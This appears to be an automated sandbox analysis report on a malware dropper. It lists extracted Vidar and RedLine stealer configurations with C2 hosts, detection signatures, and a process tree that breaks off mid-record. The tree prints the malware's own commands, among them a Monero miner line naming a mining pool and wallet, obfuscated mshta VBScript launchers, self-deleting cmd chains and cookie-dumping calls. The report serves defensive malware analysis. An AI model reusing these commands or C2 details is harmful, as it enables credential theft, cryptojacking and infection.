Analysis

  • max time kernel
    133s
  • max time network
    318s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    23-08-2021 20:55

General

  • Target

    xiGD01oEkhh5s50F0Mw8lPVJ.exe

  • Size

    381KB

  • MD5

    58f5dca577a49a38ea439b3dc7b5f8d6

  • SHA1

    175dc7a597935b1afeb8705bd3d7a556649b06cf

  • SHA256

    857dd46102aea53f0cb7934b96410ebbc3e7988d38dcafdc8c0988f436533b98

  • SHA512

    3c75c0cbbbc14bd25b4feb141fd1595ce02469da50432fb48400eb089d6150fe87831ccc775d921eeec697af7aad33a35fadcfd2ec775aeee1ce34355af7338a

Malware Config

Extracted

Family

vidar

Version

40.1

Botnet

916

C2

https://eduarroma.tumblr.com/

Attributes
  • profile_id

    916

Extracted

Family

redline

Botnet

allsup

C2

188.124.36.242:25802

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • NetSupport

    NetSupport is a remote access tool sold as a legitimate system administration software.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 3 IoCs
  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Socelars Payload 2 IoCs
  • Suspicious use of NtCreateProcessExOtherParentProcess 2 IoCs
  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • suricata: ET MALWARE Generic Password Stealer User Agent Detected (RookIE)

    suricata: ET MALWARE Generic Password Stealer User Agent Detected (RookIE)

  • suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01

    suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01

  • suricata: ET MALWARE Potential Dridex.Maldoc Minimal Executable Request

    suricata: ET MALWARE Potential Dridex.Maldoc Minimal Executable Request

  • suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)

    suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)

  • suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

    suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

  • suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload

    suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload

  • suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil

    suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Vidar Stealer 2 IoCs
  • Creates new service(s) 1 TTPs
  • Downloads MZ/PE file
  • Executes dropped EXE 64 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Checks BIOS information in registry 2 TTPs 10 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 33 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 5 IoCs
  • Enumerates connected drives 3 TTPs 64 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 9 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 9 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 4 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 10 IoCs
  • Checks SCSI registry key(s) 3 TTPs 9 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 3 IoCs
  • Kills process with taskkill 5 IoCs
  • Modifies registry class 3 IoCs
  • Modifies system certificate store 2 TTPs 4 IoCs
  • Runs ping.exe 1 TTPs 2 IoCs
  • Script User-Agent 23 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious behavior: SetClipboardViewer 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\xiGD01oEkhh5s50F0Mw8lPVJ.exe
    "C:\Users\Admin\AppData\Local\Temp\xiGD01oEkhh5s50F0Mw8lPVJ.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:748
    • C:\Users\Admin\AppData\Local\Temp\is-IMVR7.tmp\xiGD01oEkhh5s50F0Mw8lPVJ.tmp
      "C:\Users\Admin\AppData\Local\Temp\is-IMVR7.tmp\xiGD01oEkhh5s50F0Mw8lPVJ.tmp" /SL5="$20112,138429,56832,C:\Users\Admin\AppData\Local\Temp\xiGD01oEkhh5s50F0Mw8lPVJ.exe"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of WriteProcessMemory
      PID:1568
      • C:\Users\Admin\AppData\Local\Temp\is-EUIIC.tmp\Setup.exe
        "C:\Users\Admin\AppData\Local\Temp\is-EUIIC.tmp\Setup.exe" /Verysilent
        3⤵
        • Executes dropped EXE
        • Drops file in Program Files directory
        • Suspicious use of WriteProcessMemory
        PID:3580
        • C:\Program Files (x86)\GameBox INC\GameBox\Stats.exe
          "C:\Program Files (x86)\GameBox INC\GameBox\Stats.exe" /Verysilent
          4⤵
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:3180
          • C:\Users\Admin\AppData\Local\Temp\is-OOPLT.tmp\Stats.tmp
            "C:\Users\Admin\AppData\Local\Temp\is-OOPLT.tmp\Stats.tmp" /SL5="$10266,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\Stats.exe" /Verysilent
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of FindShellTrayWindow
            PID:3844
            • C:\Users\Admin\AppData\Local\Temp\is-FSVRU.tmp\builder.exe
              "C:\Users\Admin\AppData\Local\Temp\is-FSVRU.tmp\builder.exe" -algo'' -pool'stratum+tcp://xmr-asia1.nanopool.org:14444' -wallet'42Lm2CeGer8hubckgimBBXhKWRnZqtLx74Ye2HcyMyikARReDxWRn15Bia1k8qgnboPNxEZJHN5HgX8eNa1EP7xeA3X8Z7s' -load'50' -idleload'50' -loggerSa'2no.co' -loggerS'1C6Ua7' -loggerRa'iplogger.org' -loggerR'1cmAy7' -loggerWa'2no.co' -loggerW'' -ico'' -glue'' -error'' -worker'' -icrypt'' -sremoval'' -ntask'SystemCheck' -ptask'System\' -atask'Microsoft_Corporation' -dtask'Starts_a_system_diagnostics_application_to_scan_for_errors_and_performance_problems.' -pinstall'Roaming\Microsoft\Windows\' -ninstall'Helper' -sinstall'-SystemCheck'
              6⤵
              • Executes dropped EXE
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious use of SetWindowsHookEx
              PID:4260
        • C:\Program Files (x86)\GameBox INC\GameBox\runvd.exe
          "C:\Program Files (x86)\GameBox INC\GameBox\runvd.exe"
          4⤵
          • Executes dropped EXE
          PID:2576
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 2576 -s 900
            5⤵
            • Suspicious use of NtCreateProcessExOtherParentProcess
            • Program crash
            PID:4748
        • C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe
          "C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SID=717 CID=717 SILENT=1 /quiet
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Enumerates connected drives
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of FindShellTrayWindow
          PID:1756
          • C:\Windows\SysWOW64\msiexec.exe
            "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner 1.0.0\install\FD7DF1F\Cleaner Installation.msi" SID=717 CID=717 SILENT=1 /quiet AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629494036 SID=717 CID=717 SILENT=1 /quiet " SID="717" CID="717"
            5⤵
              PID:5548
          • C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe
            "C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe"
            4⤵
            • Executes dropped EXE
            • Suspicious use of AdjustPrivilegeToken
            PID:1280
            • C:\Windows\SysWOW64\cmd.exe
              cmd.exe /c taskkill /f /im chrome.exe
              5⤵
                PID:5204
                • C:\Windows\SysWOW64\taskkill.exe
                  taskkill /f /im chrome.exe
                  6⤵
                  • Kills process with taskkill
                  PID:1260
            • C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe
              "C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"
              4⤵
              • Executes dropped EXE
              • Suspicious use of WriteProcessMemory
              PID:3356
              • C:\Users\Admin\AppData\Local\Temp\is-UBK7I.tmp\MediaBurner2.tmp
                "C:\Users\Admin\AppData\Local\Temp\is-UBK7I.tmp\MediaBurner2.tmp" /SL5="$102DA,506086,422400,C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"
                5⤵
                • Executes dropped EXE
                PID:4308
            • C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe
              "C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent
              4⤵
              • Executes dropped EXE
              • Suspicious use of WriteProcessMemory
              PID:1496
              • C:\Users\Admin\AppData\Local\Temp\is-MJFDH.tmp\VPN.tmp
                "C:\Users\Admin\AppData\Local\Temp\is-MJFDH.tmp\VPN.tmp" /SL5="$2026C,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent
                5⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Suspicious use of FindShellTrayWindow
                PID:4172
                • C:\Users\Admin\AppData\Local\Temp\is-0J70C.tmp\Setup.exe
                  "C:\Users\Admin\AppData\Local\Temp\is-0J70C.tmp\Setup.exe" /silent /subid=720
                  6⤵
                  • Executes dropped EXE
                  PID:4796
                  • C:\Users\Admin\AppData\Local\Temp\is-BKILC.tmp\Setup.tmp
                    "C:\Users\Admin\AppData\Local\Temp\is-BKILC.tmp\Setup.tmp" /SL5="$1041A,15170975,270336,C:\Users\Admin\AppData\Local\Temp\is-0J70C.tmp\Setup.exe" /silent /subid=720
                    7⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Drops file in Program Files directory
                    • Modifies system certificate store
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    • Suspicious use of FindShellTrayWindow
                    PID:2220
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "
                      8⤵
                        PID:6496
                        • C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
                          tapinstall.exe remove tap0901
                          9⤵
                          • Checks SCSI registry key(s)
                          PID:7064
                      • C:\Windows\SysWOW64\cmd.exe
                        C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "
                        8⤵
                          PID:5904
                          • C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
                            tapinstall.exe install OemVista.inf tap0901
                            9⤵
                              PID:5596
                          • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                            "C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall
                            8⤵
                              PID:5596
                            • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                              "C:\Program Files (x86)\MaskVPN\mask_svc.exe" install
                              8⤵
                                PID:192
                                • C:\Windows\System32\Conhost.exe
                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  9⤵
                                  • Executes dropped EXE
                                  PID:4892
                      • C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe
                        "C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe"
                        4⤵
                        • Executes dropped EXE
                        • Suspicious use of AdjustPrivilegeToken
                        • Suspicious use of WriteProcessMemory
                        PID:1968
                        • C:\Users\Admin\AppData\Roaming\7015641.exe
                          "C:\Users\Admin\AppData\Roaming\7015641.exe"
                          5⤵
                          • Executes dropped EXE
                          • Suspicious use of AdjustPrivilegeToken
                          PID:4216
                        • C:\Users\Admin\AppData\Roaming\2304792.exe
                          "C:\Users\Admin\AppData\Roaming\2304792.exe"
                          5⤵
                          • Executes dropped EXE
                          • Adds Run key to start application
                          PID:2136
                          • C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
                            "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
                            6⤵
                            • Executes dropped EXE
                            PID:5012
                        • C:\Users\Admin\AppData\Roaming\5567526.exe
                          "C:\Users\Admin\AppData\Roaming\5567526.exe"
                          5⤵
                          • Executes dropped EXE
                          • Suspicious use of AdjustPrivilegeToken
                          PID:4376
                        • C:\Users\Admin\AppData\Roaming\4285606.exe
                          "C:\Users\Admin\AppData\Roaming\4285606.exe"
                          5⤵
                          • Executes dropped EXE
                          • Suspicious use of AdjustPrivilegeToken
                          PID:4652
                        • C:\Users\Admin\AppData\Roaming\5707305.exe
                          "C:\Users\Admin\AppData\Roaming\5707305.exe"
                          5⤵
                          • Executes dropped EXE
                          PID:4584
                      • C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe
                        "C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe"
                        4⤵
                        • Executes dropped EXE
                        • Checks computer location settings
                        • Suspicious behavior: EnumeratesProcesses
                        PID:4224
                        • C:\Users\Admin\Documents\YPCv144pphZIylOARCmBKB2P.exe
                          "C:\Users\Admin\Documents\YPCv144pphZIylOARCmBKB2P.exe"
                          5⤵
                            PID:4892
                            • C:\Windows\SysWOW64\cmd.exe
                              "C:\Windows\System32\cmd.exe" /c taskkill /im YPCv144pphZIylOARCmBKB2P.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\YPCv144pphZIylOARCmBKB2P.exe" & del C:\ProgramData\*.dll & exit
                              6⤵
                                PID:7268
                                • C:\Windows\SysWOW64\taskkill.exe
                                  taskkill /im YPCv144pphZIylOARCmBKB2P.exe /f
                                  7⤵
                                  • Kills process with taskkill
                                  PID:7948
                                • C:\Windows\SysWOW64\timeout.exe
                                  timeout /t 6
                                  7⤵
                                  • Delays execution with timeout.exe
                                  PID:6380
                            • C:\Users\Admin\Documents\CxrdbnsYmJXIYC8ZCq3_eatq.exe
                              "C:\Users\Admin\Documents\CxrdbnsYmJXIYC8ZCq3_eatq.exe"
                              5⤵
                              • Executes dropped EXE
                              • Loads dropped DLL
                              PID:5032
                            • C:\Users\Admin\Documents\UOOu7lNtPV4PNh_B7bK8DVoZ.exe
                              "C:\Users\Admin\Documents\UOOu7lNtPV4PNh_B7bK8DVoZ.exe"
                              5⤵
                              • Executes dropped EXE
                              • Suspicious use of AdjustPrivilegeToken
                              PID:4772
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -u -p 4772 -s 1668
                                6⤵
                                • Program crash
                                PID:6904
                            • C:\Users\Admin\Documents\81YOA98fWeBFjZfCfPZnz1R9.exe
                              "C:\Users\Admin\Documents\81YOA98fWeBFjZfCfPZnz1R9.exe"
                              5⤵
                              • Executes dropped EXE
                              • Suspicious use of SetThreadContext
                              PID:4808
                              • C:\Users\Admin\Documents\81YOA98fWeBFjZfCfPZnz1R9.exe
                                C:\Users\Admin\Documents\81YOA98fWeBFjZfCfPZnz1R9.exe
                                6⤵
                                • Executes dropped EXE
                                PID:5992
                            • C:\Users\Admin\Documents\Yw8U_JxIWkXmT2vRB5edDPOf.exe
                              "C:\Users\Admin\Documents\Yw8U_JxIWkXmT2vRB5edDPOf.exe"
                              5⤵
                              • Executes dropped EXE
                              PID:4640
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -u -p 4640 -s 664
                                6⤵
                                • Program crash
                                PID:900
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -u -p 4640 -s 680
                                6⤵
                                • Program crash
                                PID:5664
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -u -p 4640 -s 684
                                6⤵
                                • Program crash
                                PID:4068
                            • C:\Users\Admin\Documents\O5_mwR6IuhYz_5jqbMnXOb4H.exe
                              "C:\Users\Admin\Documents\O5_mwR6IuhYz_5jqbMnXOb4H.exe"
                              5⤵
                              • Executes dropped EXE
                              PID:4360
                            • C:\Users\Admin\Documents\MuwqvsPFX96gdgOc_2BXvamW.exe
                              "C:\Users\Admin\Documents\MuwqvsPFX96gdgOc_2BXvamW.exe"
                              5⤵
                              • Executes dropped EXE
                              PID:4060
                              • C:\Users\Admin\AppData\Roaming\5188343.exe
                                "C:\Users\Admin\AppData\Roaming\5188343.exe"
                                6⤵
                                  PID:7072
                                • C:\Users\Admin\AppData\Roaming\2736613.exe
                                  "C:\Users\Admin\AppData\Roaming\2736613.exe"
                                  6⤵
                                  • Suspicious behavior: SetClipboardViewer
                                  PID:7116
                                • C:\Users\Admin\AppData\Roaming\3155323.exe
                                  "C:\Users\Admin\AppData\Roaming\3155323.exe"
                                  6⤵
                                    PID:7152
                                  • C:\Users\Admin\AppData\Roaming\4437870.exe
                                    "C:\Users\Admin\AppData\Roaming\4437870.exe"
                                    6⤵
                                      PID:4992
                                  • C:\Users\Admin\Documents\3dStGRB5_5z5kl0pdXNKw8KC.exe
                                    "C:\Users\Admin\Documents\3dStGRB5_5z5kl0pdXNKw8KC.exe"
                                    5⤵
                                    • Executes dropped EXE
                                    PID:5208
                                    • C:\Users\Admin\Documents\3dStGRB5_5z5kl0pdXNKw8KC.exe
                                      "C:\Users\Admin\Documents\3dStGRB5_5z5kl0pdXNKw8KC.exe"
                                      6⤵
                                        PID:6312
                                      • C:\Users\Admin\Documents\3dStGRB5_5z5kl0pdXNKw8KC.exe
                                        "C:\Users\Admin\Documents\3dStGRB5_5z5kl0pdXNKw8KC.exe"
                                        6⤵
                                          PID:6308
                                      • C:\Users\Admin\Documents\xjs3mw1bN8Hgit2d0KxOTvr8.exe
                                        "C:\Users\Admin\Documents\xjs3mw1bN8Hgit2d0KxOTvr8.exe"
                                        5⤵
                                        • Executes dropped EXE
                                        • Checks BIOS information in registry
                                        • Checks whether UAC is enabled
                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                        PID:5304
                                      • C:\Users\Admin\Documents\pAnyK8gwLEtBFe86bDDQpgWE.exe
                                        "C:\Users\Admin\Documents\pAnyK8gwLEtBFe86bDDQpgWE.exe"
                                        5⤵
                                        • Executes dropped EXE
                                        • Suspicious use of SetThreadContext
                                        PID:5292
                                        • C:\Users\Admin\Documents\pAnyK8gwLEtBFe86bDDQpgWE.exe
                                          "C:\Users\Admin\Documents\pAnyK8gwLEtBFe86bDDQpgWE.exe"
                                          6⤵
                                          • Executes dropped EXE
                                          • Checks SCSI registry key(s)
                                          • Suspicious behavior: MapViewOfSection
                                          PID:4788
                                      • C:\Users\Admin\Documents\UanHfLTYCfJh6FZOc3I3aPBg.exe
                                        "C:\Users\Admin\Documents\UanHfLTYCfJh6FZOc3I3aPBg.exe"
                                        5⤵
                                        • Executes dropped EXE
                                        PID:5496
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -u -p 5496 -s 480
                                          6⤵
                                          • Suspicious use of NtCreateProcessExOtherParentProcess
                                          • Program crash
                                          PID:1780
                                      • C:\Users\Admin\Documents\KTcFnZEIePx9_JDVNUluPqJ3.exe
                                        "C:\Users\Admin\Documents\KTcFnZEIePx9_JDVNUluPqJ3.exe"
                                        5⤵
                                        • Executes dropped EXE
                                        PID:5484
                                      • C:\Users\Admin\Documents\v4BoW79EXHq0JCHzEMLzlDOC.exe
                                        "C:\Users\Admin\Documents\v4BoW79EXHq0JCHzEMLzlDOC.exe"
                                        5⤵
                                        • Executes dropped EXE
                                        PID:5468
                                        • C:\Users\Admin\Documents\v4BoW79EXHq0JCHzEMLzlDOC.exe
                                          "C:\Users\Admin\Documents\v4BoW79EXHq0JCHzEMLzlDOC.exe"
                                          6⤵
                                            PID:7712
                                        • C:\Users\Admin\Documents\Z7EzvH0MgGMru2S6_QCveS09.exe
                                          "C:\Users\Admin\Documents\Z7EzvH0MgGMru2S6_QCveS09.exe"
                                          5⤵
                                          • Executes dropped EXE
                                          • Checks BIOS information in registry
                                          • Checks whether UAC is enabled
                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                          PID:5552
                                        • C:\Users\Admin\Documents\_bTcJNEFfnFAvmOWimWnKgBz.exe
                                          "C:\Users\Admin\Documents\_bTcJNEFfnFAvmOWimWnKgBz.exe"
                                          5⤵
                                          • Executes dropped EXE
                                          PID:5824
                                          • C:\Users\Admin\Documents\_bTcJNEFfnFAvmOWimWnKgBz.exe
                                            "C:\Users\Admin\Documents\_bTcJNEFfnFAvmOWimWnKgBz.exe" -q
                                            6⤵
                                            • Executes dropped EXE
                                            PID:6456
                                        • C:\Users\Admin\Documents\GtXuVpkHD1RR6DJ5OoRVbYiq.exe
                                          "C:\Users\Admin\Documents\GtXuVpkHD1RR6DJ5OoRVbYiq.exe"
                                          5⤵
                                          • Executes dropped EXE
                                          PID:5796
                                          • C:\Users\Admin\Documents\GtXuVpkHD1RR6DJ5OoRVbYiq.exe
                                            "C:\Users\Admin\Documents\GtXuVpkHD1RR6DJ5OoRVbYiq.exe"
                                            6⤵
                                              PID:8140
                                            • C:\Users\Admin\Documents\GtXuVpkHD1RR6DJ5OoRVbYiq.exe
                                              "C:\Users\Admin\Documents\GtXuVpkHD1RR6DJ5OoRVbYiq.exe"
                                              6⤵
                                                PID:6280
                                            • C:\Users\Admin\Documents\pcuoyDEm3RIoM0KqDfObZcmK.exe
                                              "C:\Users\Admin\Documents\pcuoyDEm3RIoM0KqDfObZcmK.exe"
                                              5⤵
                                              • Executes dropped EXE
                                              PID:3924
                                              • C:\Windows\SysWOW64\cmd.exe
                                                "C:\Windows\System32\cmd.exe" /c taskkill /im pcuoyDEm3RIoM0KqDfObZcmK.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\pcuoyDEm3RIoM0KqDfObZcmK.exe" & del C:\ProgramData\*.dll & exit
                                                6⤵
                                                  PID:7700
                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                    taskkill /im pcuoyDEm3RIoM0KqDfObZcmK.exe /f
                                                    7⤵
                                                    • Kills process with taskkill
                                                    PID:8004
                                                  • C:\Windows\SysWOW64\timeout.exe
                                                    timeout /t 6
                                                    7⤵
                                                    • Delays execution with timeout.exe
                                                    PID:7944
                                              • C:\Users\Admin\Documents\OBmVLVdD1gQBv_4OOmsJxLm5.exe
                                                "C:\Users\Admin\Documents\OBmVLVdD1gQBv_4OOmsJxLm5.exe"
                                                5⤵
                                                • Executes dropped EXE
                                                • Checks BIOS information in registry
                                                • Checks whether UAC is enabled
                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                PID:5260
                                              • C:\Users\Admin\Documents\S_Rhe1EMDrJRYwnYQ25ngnzV.exe
                                                "C:\Users\Admin\Documents\S_Rhe1EMDrJRYwnYQ25ngnzV.exe"
                                                5⤵
                                                • Executes dropped EXE
                                                PID:5424
                                              • C:\Users\Admin\Documents\o5Z0vVBgPoS6Nljy8ZhAYeqf.exe
                                                "C:\Users\Admin\Documents\o5Z0vVBgPoS6Nljy8ZhAYeqf.exe"
                                                5⤵
                                                • Executes dropped EXE
                                                PID:5312
                                                • C:\Windows\SysWOW64\mshta.exe
                                                  "C:\Windows\System32\mshta.exe" vBscrIpT: ClOsE ( CrEaTeobjeCt ( "WsCRIPt.SHELl" ). RUN( "cmD.EXe /C coPy /y ""C:\Users\Admin\Documents\o5Z0vVBgPoS6Nljy8ZhAYeqf.exe"" Z2bT94N_CMSE.Exe && START Z2Bt94N_cMSE.eXE -PMrvgB7ejl2YIjc3PC8aTZbo &IF """" == """" for %j iN ( ""C:\Users\Admin\Documents\o5Z0vVBgPoS6Nljy8ZhAYeqf.exe"" ) do taskkill -im ""%~NXj"" -f " , 0 , tRue ) )
                                                  6⤵
                                                    PID:6308
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      "C:\Windows\System32\cmd.exe" /C coPy /y "C:\Users\Admin\Documents\o5Z0vVBgPoS6Nljy8ZhAYeqf.exe" Z2bT94N_CMSE.Exe && START Z2Bt94N_cMSE.eXE -PMrvgB7ejl2YIjc3PC8aTZbo&IF "" == "" for %j iN ( "C:\Users\Admin\Documents\o5Z0vVBgPoS6Nljy8ZhAYeqf.exe" ) do taskkill -im "%~NXj" -f
                                                      7⤵
                                                        PID:6928
                                                        • C:\Users\Admin\AppData\Local\Temp\Z2bT94N_CMSE.Exe
                                                          Z2Bt94N_cMSE.eXE -PMrvgB7ejl2YIjc3PC8aTZbo
                                                          8⤵
                                                            PID:7088
                                                            • C:\Windows\SysWOW64\mshta.exe
                                                              "C:\Windows\System32\mshta.exe" vBscrIpT: ClOsE ( CrEaTeobjeCt ( "WsCRIPt.SHELl" ). RUN( "cmD.EXe /C coPy /y ""C:\Users\Admin\AppData\Local\Temp\Z2bT94N_CMSE.Exe"" Z2bT94N_CMSE.Exe && START Z2Bt94N_cMSE.eXE -PMrvgB7ejl2YIjc3PC8aTZbo &IF ""-PMrvgB7ejl2YIjc3PC8aTZbo"" == """" for %j iN ( ""C:\Users\Admin\AppData\Local\Temp\Z2bT94N_CMSE.Exe"" ) do taskkill -im ""%~NXj"" -f " , 0 , tRue ) )
                                                              9⤵
                                                                PID:6140
                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                  "C:\Windows\System32\cmd.exe" /C coPy /y "C:\Users\Admin\AppData\Local\Temp\Z2bT94N_CMSE.Exe" Z2bT94N_CMSE.Exe && START Z2Bt94N_cMSE.eXE -PMrvgB7ejl2YIjc3PC8aTZbo&IF "-PMrvgB7ejl2YIjc3PC8aTZbo" == "" for %j iN ( "C:\Users\Admin\AppData\Local\Temp\Z2bT94N_CMSE.Exe" ) do taskkill -im "%~NXj" -f
                                                                  10⤵
                                                                    PID:6056
                                                                • C:\Windows\SysWOW64\rundll32.exe
                                                                  "C:\Windows\System32\rundll32.exe" .\HwWYSzK.F2,zgr
                                                                  9⤵
                                                                    PID:5760
                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                  taskkill -im "o5Z0vVBgPoS6Nljy8ZhAYeqf.exe" -f
                                                                  8⤵
                                                                  • Kills process with taskkill
                                                                  PID:4404
                                                          • C:\Users\Admin\Documents\dvTLQXItS4WQaW5zmJh6PYWK.exe
                                                            "C:\Users\Admin\Documents\dvTLQXItS4WQaW5zmJh6PYWK.exe"
                                                            5⤵
                                                            • Executes dropped EXE
                                                            • Loads dropped DLL
                                                            • Drops file in Program Files directory
                                                            PID:4308
                                                            • C:\Program Files (x86)\Company\NewProduct\jooyu.exe
                                                              "C:\Program Files (x86)\Company\NewProduct\jooyu.exe"
                                                              6⤵
                                                              • Executes dropped EXE
                                                              PID:6404
                                                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                7⤵
                                                                  PID:6056
                                                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                  7⤵
                                                                    PID:7668
                                                                • C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
                                                                  "C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
                                                                  6⤵
                                                                  • Executes dropped EXE
                                                                  PID:6396
                                                                • C:\Program Files (x86)\Company\NewProduct\customer3.exe
                                                                  "C:\Program Files (x86)\Company\NewProduct\customer3.exe"
                                                                  6⤵
                                                                  • Executes dropped EXE
                                                                  PID:6388
                                                                  • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                    C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                    7⤵
                                                                      PID:2392
                                                                    • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                      C:\Users\Admin\AppData\Local\Temp\11111.exe /DeleteCookiesWildcard "*.facebook.com"
                                                                      7⤵
                                                                        PID:7240
                                                                      • C:\Users\Admin\AppData\Local\Temp\11111.exe
